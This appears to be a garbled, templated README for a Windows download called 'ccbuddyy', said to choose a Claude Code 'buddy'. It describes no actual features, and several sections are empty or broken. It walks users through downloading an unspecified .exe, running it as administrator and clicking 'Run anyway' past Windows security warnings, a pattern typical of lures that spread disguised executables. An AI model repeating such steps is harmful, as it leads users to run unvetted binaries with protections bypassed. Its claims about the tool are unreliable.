ccbuddyy helps you pick your Claude Code buddy with less guesswork. It gives you a simple way to choose and manage the helper you want to use while you work.
Use it when you want a clearer path to the right Claude Code setup without digging through extra steps.
- Open the release page.
- Find the latest release at the top of the page.
- Look for a Windows file, such as an
.exeor a.zipfile. - Download the file to your computer.
- If you downloaded a
.zipfile, open it and extract the contents. - If you downloaded an
.exefile, double-click it to run the app.

After you download the app, set it up with these steps:
- Open the folder where your download was saved.
- If the file is zipped, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file.
- If Windows asks for permission, choose Yes or Run.
- Follow the prompts on the screen.
If the app opens in a small window or on the taskbar, that is normal. You can move it around like any other Windows app.

- Start the app.

When you open ccbuddyy, you may see options such as:

Open the app and select the buddy you want. Then confirm your choice.
Open the app again and pick a different one. Save the new choice.
If you cannot find the file, check these places:
- Downloads folder
- Desktop
- Recent files in File Explorer
If you want to remove ccbuddyy, delete the app files from the folder where you extracted them. If you used a .zip file, you can also delete the zip file after you are done with it.
- Make sure the download finished
- Check that you downloaded the Windows file
- Try running the file again
- Right-click the file and choose Run as administrator
- Choose More info if needed
- Then choose Run anyway if you trust the file source
- Make sure you downloaded it from the release page
- Check the taskbar
- Look behind other windows
- Open Task Manager and see if the app is running
- Close it and start it again
- Try again from the release page
- Save the file to your Downloads folder
- Make sure your browser did not stop the download

If the release page offers more than one file, choose the Windows one that matches your setup.
